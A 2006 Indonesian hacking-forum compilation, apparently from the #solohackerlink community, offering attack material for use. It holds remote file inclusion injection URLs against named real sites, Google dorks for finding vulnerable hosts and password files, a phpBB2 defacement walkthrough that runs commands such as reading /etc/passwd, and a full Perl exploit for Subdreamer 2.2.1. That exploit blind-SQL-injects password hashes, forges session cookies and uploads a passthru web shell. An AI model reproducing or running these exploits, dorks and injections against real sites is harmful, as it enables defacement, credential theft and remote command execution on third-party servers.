TUTORIAL HACKING

KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet

6
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking, Defacing,
Cracking, dan yang berhubungan dengan dunia Komputer.

Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.

-ChanServ- Channel: #solohackerlink

-ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago
-ChanServ- Successor: POM_PONK << ONLINE >>
-ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)
-ChanServ- Last Used: 0 seconds ago
-ChanServ- Topic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ] Selamat
Menunaikan Ibadah Syaum

-ChanServ- Email: [email protected]

-ChanServ- Url: www.solohackerlink.s.to atau www.solohackerlink.cool.to

-ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose

-ChanServ- Mode Lock: -i

phphg
eVuln ID: EV0058
CVE: CVE-2006-0602 CVE-2006-0603 CVE-2006-0604
Vendor: Hinton Design
Vendor´s Web Site: http://www.hintondesign.org
Software: phphg Guestbook
Sowtware´s Web Site: http://www.hintondesign.org/downloads/view_cat.php?cat_id=45
Versions: 1.2
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-----------------Description---------------
1. Authentication Bypass
Vulnerable script: check.php

There are two ways to bypass authentication:

a) SQL Injection
Variable $HTTP_POST_VARS[username] isn´t properly sanitized before being used in a SQL query. This
can be used to make any SQL query
by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

b) Cookie based authentication

check.php script dont make password comparisson when identifying user by cookies

2. Multiple Cross-Site Scripting

Vulnerable script: signed.php
Variables $HTTP_POST_VARS[location] $HTTP_POST_VARS[website] $HTTP_POST_VARS[message]
are not properly sanitized. This can be used
to post arbitrary html or script code.

3. SQL Injections in administrator control panel

Vulnerable scripts:
admin/edit_smilie.php
admin/add_theme.php
admin/ban_ip.php
admin/add_lang
admin/edit_filter

Variable $HTTP_GET_VARS[id] variable isn´t properly sanitized. This can be used to make any SQL query
by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off
Post by : pinguingilo on [ 23 February 2006 10:27:22 ]

Bugs baru tapi pusing ???

keyword : "powered by PLUME CMS"

http://target.com/dir/prepend.php?_PX_config[manager_path]=ijekpakekaki

Post by : pinguingilo on [ 23 February 2006 10:09:18 ]

phorum bugs
Bug : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=injekan

keyword : /phorum/login.php
contoh : http://www.shpl.ru/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=injekan

Post by : pinguingilo on [ 22 February 2006 10:08:01 ] 2

Membuat Mirc Trojan

tutorial singkat pembuatan mirc trojan silahkan baca disini :

http://www.geocities.com/novitasarita/IRCTrojan.pdf

good luck

Post by : pinguingilo on [ 22 February 2006 10:06:16 ]

 Hack Forum Phpbb2 pakai Tool PhpBB_defacer
Kali ini awak coba jelasin cara hack pakai tool PhpBB_defacer.
Langkah pertama siapkan www.google.com,cari kata forum phpbb2.
misalkan kita ambil contoh kek ini:http://www.target.com/forum/viewtopic.php?t=XXX

Setelah kita dapet targetnya kita download tool yg akan kita gunakan
untuk mendeface target diatas.
nih alamat web toolna "http://www.indianz.ch/tools/sploits/phpbb_defacer.zip"

download sampai komplit setelah itu simpan di komputer kamu.

dan jangan lupa di install sekalian.

kalo dah terinstall buka aja tool tersebut dan masukkan alamat web target.

"url:http://www.target.com/forum/viewtopic.php?t=XXX
"Command: (ls -al) (masukkan command unix)
(id)
(cat /etc/passwd)
(find httpd.conf in server)
(pwd)

setelah itu klik icon "RUN" dan tunggu beberapa saat, kalo ada tulisan kek begini
"SORRY NOT VUNLIBITY" coba klik RUN sekali lagi,dan klo tidak bisa lagi cari target yang lain.

Nah supaya tahu kalo target tersebut dapat dieksekusi dengan tool PhpBB_defacer
akan muncul tulisan "username" (isi dengan nick kamu)
kamu ketik hacked oleh:
(Papmahackerlink by: nick kamu)
kemudian klik tulisan Deface dan klik Add
kalo ada tulisan SUCCESS berarti kamu berhasil.

Post by : pinguingilo on [ 22 February 2006 10:04:45 ] 202.93.35.136

Reply no: 1

wekss kwkekwkekwkke

Reply by : POM_PONK on [ 23 February 2006 23:54:04 ]

Bugs Nggak Jelas Nich !!!

ini bugs juga tapi nggak jelas !!! keywordnya aja nggak ad.
tapi ini bugs untuk indexu
http://[target]/[path]/applica tion.php?base_path=injekan

Post by : pinguingilo on [ 22 February 2006 10:02:39 ]

Web Hosting Gratis ( Bandwidth 2 - 4 GB, 50 - 150

Diskspace )
Web Hosting yang kapasitas bandwidthnya luar biasa...
www.pandela.com

Post by : pinguingilo on [ 22 February 2006 10:00:58 ]

Kietu? v 3.2
Bug : kietu/index.php?kietu[url_hit]=
Contoh :
http://www.fxmodelrc.com/kietu/index.php?kietu[url_hit]=injekan

Post by : pinguingilo on [ 22 February 2006 09:59:25

HostAdmin Bugs
Google ketik :"Powered by HostAdmin"
ini tambahannnya di target /directory/index.php?path=[suntik.txt]

Post by : pinguingilo on [ 22 February 2006 09:55:53

nggak tau Bugs Baru or Lama ???

keywordnya : inurl:"*.php?mode=join" trus gini
index.php?mode=inject pake kaki

exemple :
http://www.variazn.com/friends/index.php?mode=http://geocities.com/pinguingilo/toolx/hai.txt?

salam
ibunk.or.id

Post by : pinguingilo on [ 22 February 2006 09:21:43 ] 2

Google Hacking

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada Google untuk
menemukan targetnya. Seperti Worm Santy yang melakukan defacing secara massal dengan
memanfaatkan Google. Dalam hitungan hari ribuan website tampilan utamanya berubah
Pada bagian ini disajikan artikel tentang google hacking yang berguna untuk memahami bagaimana
melakukan pencarian yang baik dengan menggunakan Google. Pada bagian akhir juga terdapat trik-
trik dan keyword yang sering digunakan untuk melakukan pencarian file dan jugabagaimana
mencari target dengan memanfaatkan Google.

01 // Penggunaan Dasar - Google tidak "case sensitive". Keyword: linux = LINUX = LiNuX Akan
menghasilkan hal yang sama- AND: Secara Default Google menggunakan keyword and. Keyword:
menjadi hacker Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"- OR: Digunakan
untuk menemukan halaman yang setidaknya berisi salah satu dari keyword. Note: OR dituliskan
dengan huruf besar semua. Keyword: hacker OR cracker Hasilnya pencarian akan mengandung kata
"hacker" atau "cracker"- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda bisa menambahkan "+" didepan
keyword tersebut. Keyword: hacker how ==> Kata "how" akan diabaikan Keyword: hacker +how
==> Kata "how" akan diikutsertakan- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-
kata tertentu dalam pencarian. Misal kita ingin mencari kata "linus tanpa linux", kita bisa
menggunakan "linus -linux"- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja* Google tidak mencari kata "menjamu",
"menjadi", "menjalar", dll Google akan menghasilkan pencarian hanya yang mengandung kata
"menja". Tetapi google mendukung penggunaan * dalam pencarian kalimat. Keyword: "menjadi *
hacker" Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker", "menjadi white hacker",
dll.- "": Dapat digunakan untuk mencari kata yg lengkap. Keyword: "menjadi hacker" Hasilnya
pencarian akan mengandung kata "menjadi hacker"- ?: Dapat digunakan untuk mencari pada
direktori Google Keyword: ?intitle:index.of? mp302 // Operator Spesial -- Contoh hasil pencarian --
Google --> Judul... Language Tools. Ways to help with tsunami relief Advertising Programs -
About Google ©2005 Google - > DeskripsiSearching 8,058,044,651 web pages. /www.google.com/
- 3k - 5 Jan 2005 --> URL-- Contoh hasil pencarian --- intitle: Untuk mencari kata-kata dari judul
suatu halaman web. Keyword: intitle:Admin Administrasi Keyword tersebut akan mencari judul
halaman "Admin" dengan deskripsi "Administrasi"- allintitle: Untuk mencari kata-kata dari judul
halaman web secara lengkap. Keyword: allintitle:Admin Administrasi Keyword tersebut akan
mencari judul halaman yang mengandung kata "Admin" dan "Administrasi"- inurl: Digunakan
untuk mencari semua URL yang berisi kata-kata tertentu. Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin" dengan deskripsi
"Administrasi"- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata tertentu.
Keyword: allinurl:Admin Administrasi Keyword tersebut akan mencari URL yang mengandung
kata "Admin" dan "Administrasi"- site: Untuk mencari dalam suatu situs tertentu saja Keyword:
site:saleho.info Semua pencarian hanya berdasarkan site "saleho.info"- cache: Ketika Googlebot
mengindeks suatu situs, google akan mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah dicache. Keyword: cache:saleho.info
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya pada snapshot/cache yang
disimpan oleh Google.- define: Operator ini digunakan untuk mencari definisi dari frasa tertentu.
Semua kata yang diketik setelah operator ini akan diperlakukan sebagai satu frasa. Keyword:
define:hacker- filetype: Jika kita mencari jenis file tertentu yang berisi informasi yang anda inginkan
kita bisa menggunakan operator ini. Keyword: "hacker" filetype:pdf Sampai tulisan ini dibuat
google support tipe file # Adobe Portable Document Format (pdf) # Adobe PostScript (ps) # Lotus
1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku) # Lotus WordPro (lwp) # MacWrite (mw) #
Microsoft Excel (xls) # Microsoft PowerPoint (ppt) # Microsoft Word (doc) # Microsoft Works
(wks, wps, wdb) # Microsoft Write (wri) # Rich Text Format (rtf) # Shockwave Flash (swf) # Text
(ans, txt) Ref: http://www.google.com/help/faq_filetypes.html- link: Untuk mencari tahu berapa
banyak link ke suatu situs, kita bisa menggunakan operator link. Keyword: link:www.google.com-
related: Untuk mencari halaman yang isinya mirip dengan URL tertentu. Keyword:
related:www.google.com03 // Manipulasi URL Google > And bisa mengganti interface google
dengan mengganti variabel hl (default google hl=en => bahasa inggris) Misalkan kita mengubah
interface-nya menjadi bahasa Indonesia. Ex: http://www.google.com/search?hl=en&lr=&q=site%
3Asaleho.info&btnG=Search Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Asaleho.info&btnG=Search > Anda dapat
mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini dilakukan dengan modifikasi variabel
lr. (default google lr=lang_en => bahasa inggris) Misalkan kita hasil pencarian hanya bahasa
Indonesia. Ex: http://www.google.com/search?hl=en&lr=&q=site%3Asaleho.info&btnG=Search
Hasil modifikasi URL http://www.google.com/search?hl=en&lr=lang_id&q=site%
3Asaleho.info&btnG=Search > Secara default google akan menampilkan 10 site perhalaman. Anda
dapat mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel num pada
URL :D Penggunaan num antara 1-100 Ex: http://www.google.com/search?hl=en&lr=&q=site%
3Asaleho.info&btnG=Search Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Asaleho.info&btnG=Search >
as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini digunakan menentukan
hasil berdasarkan bulan. x antara 1-12 Ex: http://www.google.com/search?hl=en&lr=&q=site%
3Asaleho.info&btnG=Search Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Asaleho.info&btnG=Search >
safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch" untuk memfilter hasil
pencarian sexual. Dengan pengetahuan di atas anda dapat membuat sendiri form Google di
komputer sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih dahulu
(kecuali anda menggunakan brwoser yang support google secara built-in atau menggunakan Google
Toolbar). Dengan melakukan ini kita bisa menghemat bandwidth ke luar negeri :D Karena
bandwidth di Indonesia mahal ........ Contoh script google.html lengkap dengan varabielnya. --- BOF
google.html --- <form action="http://www.google.com/search" name=f> Variabel num: <input
name=num value=10><br> Variabel hl: <input name=hl value=en><br> Variabel lr: <input
name=lr value=lang_id><br> Variabel as_qdr: <input name=as_qdr value=m12><br> Variabel
safe: <input name=safe value=off><br> <input maxLength=256 size=55 name=q value=""><br>
<input type=submit value="Google Search" name=btnG> </form> --- EOF google.html --- Anda
tinggal menghilangkan Variabel yang tidak anda inginkan atau menambahkan apapun disana.
Semuanya terserah kepada anda :D Berikut merupakan script default pencarian google. --- BOF
google.html --- <form action="http://www.google.com/search" name=f> <input maxLength=256
size=55 name=q value=""><br> <input type=submit value="Google Search" name=btnG> </form>
--- EOF google.html --- Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com 04 // Tips & Tricks Dari dasar-dasar
dan spesial operator tersebut anda bisa mencampurkan operator-operator tersebut. Ex: - Keyword:
site:echo.or.id, menghasilkan semua site saleho.info. Kemudian anda bisa mencoba keyword:
site:saleho.info hacker, akan menghasilkan semua site saleho.info yang mengandung kata hacker.
Kita juga dapat melakukan pencarian secara spesifik melalui google. Untuk melakukannya anda
dapat ke site berikut: - http://www.google.com/bsd - http://www.google.com/mac -
http://www.google.com/linux - http://www.google.com/microsoft -
http://www.google.com/univ/education Berbagai trik keyword pada Google: parent directory books
-xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory /appz/ -xxx -html -htm
-php -shtml -opendivx -md5 -md5sums parent directory DVDRip -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums parent directory video -xxx -html -htm -php -shtml -opendivx -md5
-md5sums parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent
directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums intitle:index of intitle:mp3
-html -htm name size intitle:index of intitle:video -html -htm name size intitle:index of intitle:cgi-
bin passwd -html -htm name size intitle:index of intitle:cgi-bin password -html -htm name size
inurl:"admin.mdb" -html inurl:"password.mdb" -html inurl:"data.mdb" -html "phpMyAdmin"
"running on" inurl:"main.php" intitle:"PHP Shell" "Enable stderr" php Masih banyak lagi keyword
yang bisa ditemukan disini [5] :D Referensi [1] http://www.google.com/help/basics.html [2]
http://www.google.com/help/features.html [3] http://www.google.com/help/refinesearch.html [4]
http://www.google.com/help/interpret.html [5] http://johnny.ihackstuff.com/ [6] O´Reilly - Google
Hacks

by: PeNcOpEt_CiNtA

Post by : PeNcOpEt_CiNtA on [ 22 February 2006 08:14:17 ]

exploit phpbb, ipb2, vbulletin2

ini ada exploit dapet dari http://rst.void.ru/download/r57subdreamer.txt

cobain aja...

#!/usr/bin/perl

## Subdreamer 2.2.1 command exec exploit

##
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## supported targets:
## ~ without forum integration
## ~ with phpBB2 integration
## ~ with ipb2 integration
## ~ with vbulletin2 integration
##
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## based on RST/GHC advisory #35
## http://rst.void.ru/papers/advisory35.txt
##
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## (c)oded by 1dt.w0lf - 19/09/2005
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
##
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

## work:
##
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1
## ------------------------------------------------------------------
## [~] PATH : http://subdreamer.com.ru/
## [~] USER : 2
## [~] TARGET : 1 - PhpBB2
## [1] STEP 1 : TRY GET USER PASSWORD
## [~] SEARCHING PASSWORD ... [ DONE ]
## -----------------------------------------------------------
## USER_ID: 2
## PASS: 26310e438a5a1fb8622738f1e5d34f8b
## -----------------------------------------------------------
## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE
## [+] DONE! THIS USER HAVE ACCESS!
## [3] STEP 3 : UPLOAD FILE
## [+] DONE! FILE "img.php" UPLOADED
## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)
## SUBDREAMER# id; uname -a; ls -la;
## ----------------------------------------------------------------
## uid=1003(apache) gid=1003(apache) groups=1003(apache)
## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0:
## Fri Nov 5 04:19:18 UTC 2004 [email protected]:/usr/obj/usr/src/sys/GENERIC i386
## total 24
## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 .
## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 ..
## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image
## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php
## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos
## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies
## ----------------------------------------------------------------
## SUBDREAMER# exit
##
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

## config
## ------
##
## images folder
$img_folder = ´images´;
## or try
##$img_folder = ´images/logos´;
##
## end config

use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;

getopts(´u:p:h:t:´);

$path = $opt_p;
$user = $opt_u;
$hash = $opt_h;
$target = $opt_t || 0;

$s_num = 1;
$|++;
$n = 0;

@targets = (
#[´target name´,´colimn1 in database´,´colimn2 in database´,´cookie name 1´,´cookie name 2´]
[´Subdreamer without forum´,´userid´,´password´,´sduserid´,´sdpassword´],
[´PhpBB2´,´user_id´,´user_password´,´phpbb2mysql_data´,´´],
[´IPB2´,´id´,´member_login_key´,´member_id´,´pass_hash´],
[´PhpBB2 cookie injection´,´´,´´,´phpbb2mysql_data´,´´],
[´IPB2 cookie injection´,´id´,´´,´member_id´,´pass_hash´],
[´Vbulletin cookie injection´,´userid´,´´,´bbuserid´,´bbpassword´],
);

if (!$path || !$user || $target<0 || $target>5) { &usage; }

&head();
if($path=~/[^/]$/) { $path .= ´/´; }
print "[~] PATH : $path ";
print "[~] USER : $user ";
print "[~] TARGET : $target - $targets[$target][0] ";
if($target==1||$target==2||$target==0) {
print "[1] STEP 1 : TRY GET USER PASSWORD ";
if(!$hash){
print "[~] SEARCHING PASSWORD ... [|]";

FIND: while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{ DON E]
-----------------------------------------------------------
USER_ID: $user
PASS: $allchar
-----------------------------------------------------------
};
last FIND;
}
else
{
print " F AILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}
}
else
{
print "[~] SKIP. HASH EXISTS ";
$allchar = $hash;
}
}

print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE ";
if(&check_admin_rights())
{
print "[+] DONE! THIS USER HAVE ACCESS! ";
}
else
{
print "[-] DAMN! THIS USER NOT ADMIN =( ";
exit();
}

print "[3] STEP 3 : UPLOAD FILE ";

if(&upload_file())
{
print "[+] DONE! FILE "img.php" UPLOADED ";
}
else
{
print "[-] DAMN! UPLOAD ERROR =( ";
exit();
}
print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =) ";

while ()
{
print "SUBDREAMER# ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq ´exit´);
last;
}
&run($cmd);
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$username = "no_such_user´ OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets
[$target][2].",".$s_num.",1))".$ccheck.")) /*";

$xpl = LWP::UserAgent->new() or die;

$res = $xpl->post($path.´index.php´,
{
"loginusername" => $username,
"loginpassword" => "nap0Jlb_Haxep",
"login" => "login",
"Submit now" => "Login"
}
);
@results = $res->content;

foreach $result(@results)
{
if ($result =~ /(Database error)|(Invalid SQL)/i)
{
print " [-] SQL SYNTAX ERROR! CHECK TARGET! ";
exit();
}
#print $result;
# english pattern
if ($result =~ /Wrong Password/) { return 1; }
# russian pattern
if ($result =~ /Пароль неверен/) { return 1; }
# russian pattern 2
if ($result =~ /Неправильный пароль/) { return 1; }
# russian pattern 3 ( KOI8-R tested on subdreamer.com.ru )
if ($result =~ /оЮПНКЭ МЕБЕПЕМ/) { return 1; }
}
return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print " /]"; }
if($status==1){ print " - ]"; }
if($status==2){ print " \]"; }
if($status==3){ print " |]"; }
}

sub check_admin_rights()
{
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new( );
$xpl->cookie_jar( $cookie_jar );
($host = $path) =~ s!http://([^/]*).*!$1!;

if($target == 1)
{
# not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro
RU ???
#$cookie_jar->set_cookie( "0",$targets[$target][3], ´autologinid=´.$allchar.´|userid=
´.$user,"/",$host,,,,,);
# default phpbb2 cookie
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%
22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length
($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
}
elsif($target == 3)
{
# phpbb2 cookie with sql injection
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%
22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%
3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
}
elsif($target == 4)
{
# ipb2 cookie with sql injection
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\","/",$host,,,,,);
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2].
"=".$user."","/",$host,,,,,);
}
elsif($target == 5)
{
# Vbulletin cookie with sql injection
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\","/",$host,,,,,);
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2].
"=".$user."","/",$host,,,,,);
}
else
{
# subdreamer || ipb2 cookies
$cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
$cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
}
$res = $xpl->get($path."admin/index.php");
if($res->content =~ /loginpassword/) { return 0; }
else { return 1; }
}

sub upload_file()
{
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new( );
$xpl->cookie_jar( $cookie_jar );
($host = $path) =~ s!http://([^/]*).*!$1!;

if($target == 1)
{
# not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro
RU ???
#$cookie_jar->set_cookie( "0",$targets[$target][3], ´autologinid=´.$allchar.´|userid=
´.$user,"/",$host,,,,,);
# default phpbb2 cookie
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%
22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length
($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
}
elsif($target == 3)
{
# phpbb2 cookie with sql injection
$cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%
22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%
3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
}
elsif($target == 4)
{
# ipb2 cookie with sql injection
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\","/",$host,,,,,);
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2].
"=".$user."","/",$host,,,,,);
}
elsif($target == 5)
{
# Vbulletin cookie with sql injection
$cookie_jar->set_cookie( "0",$targets[$target][3],"666\","/",$host,,,,,);
$cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2].
"=".$user."","/",$host,,,,,);
}
else
{
# subdreamer || ipb2 cookies
$cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
$cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
}

$res = $xpl->post($path.´admin/imagemanager.php´,Content_Type => ´form-data´,

Content => [
´action´ => ´uploadimage´,
´folderpath´ => "../$img_folder/",
´MAX_FILE_SIZE´ => ´1000000´,
´image´ => [
undef,
´img.php´,
Content_type => ´text/plain´,
Content => ´<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>´,
],
´submit´ => ´Upload Image´,
],
);
if($res->content =~ /Settings Updated/) { return 1; }
if($res->content =~ /Uploading Errors/) { return 0; }
else { return 1; }
}
sub run()
{
$xpl = LWP::UserAgent->new() or die;
$res = $xpl->post($path.$img_folder.´/img.php´,{´cmd´=>$cmd});
print "---------------------------------------------------------------- ";
print $res->content;
print "---------------------------------------------------------------- ";
}

sub usage()
{
&head();
print q(| |
| - Usage: |
| r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>] |
| <path> - Path to subdreamer folder |
| <user_id> - User id for bruteforce |
| <hash> - MD5 password hash for this user if you have it =) |
| - Available targets: |
| - brute password: |
| 0 - Subdreamer without forum integration ( default ) |
| 1 - Subdreamer with PhpBB2 integration |
| 2 - Subdreamer with IPB2 integration |
| - cookie sql injection, dont need brute password: |
| 3 - Subdreamer with PhpBB2 integration 2 |
| 4 - Subdreamer with IPB2 integration 2 |
| 5 - Subdreamer with Vbulletin integration |
+--------------------------------------------------------------------+
| e.g.: |
| r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 |
| r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 |
+--------------------------------------------------------------------+
| visit us: http://rst.void.ru , http://ghc.ru |
+--------------------------------------------------------------------+
);
exit();
}

sub head()
{
print q(
+--------------------------------------------------------------------+
| Subdreamer version 2.2.1 sql injection + command execution exploit |
| by 1dt.w0lf |
| RST/GHC |
+--------------------------------------------------------------------+
);}

Post by : Comex on [ 20 February 2006 11:24:50 ]

bugs baru phpBB 2.0.6

cari di google : allinurl:Powered by phpBB 2.0.6

inject dengan:&highlight=%2527.include($_GET[a]),exit.%2527&a=

ex:http://student.ipb.ac.id/forum/viewtopic.php?p=3&highlight=%2527.include($_GET[a]),exit.%
2527&a=http://[suntikan maut]

salam
http://ali.asnawi.or.id
Post by : Comex on [ 20 February 2006 05:02:42 ]

AshNews Bugs

Keyword : "allinurl:AshNews" ato yg laen.

Injex : www.target.com/ashheadlines.php?pathtoashnews=http://nioku.host.sk/tools/roh2.txt?

selamat mencoba

Post by : obeng on [ 20 February 2006 03:30:25 ]

ngilangin banner geocities.com

mungkin teman2 dah gak asing lagi dengan free hosting di geocities.com
dan mungkin kalian punya homepage disana, babahe mo kasih tips biar homepage kalian enggak
ada banner dari geocities hehehehehe

Dibawah ini babahe kasih scriptsna tinggal kalian masukin aja.

(....mulai......)

<!-- text below generated by server. PLEASE REMOVE --

></object></layer></div></span></style></noscript></table></script></applet><script
language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script
language="JavaScript" src="http://geocities.com/js_source/geov2.js"></script><script
language="javascript">geovisit();</script><noscript><img
src="http://visit.webhosting.yahoo.com/visit.gif?us1140279104" alt="setstats" border="0"
width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001079&t=1140279104&f=us-w74" ALT=1
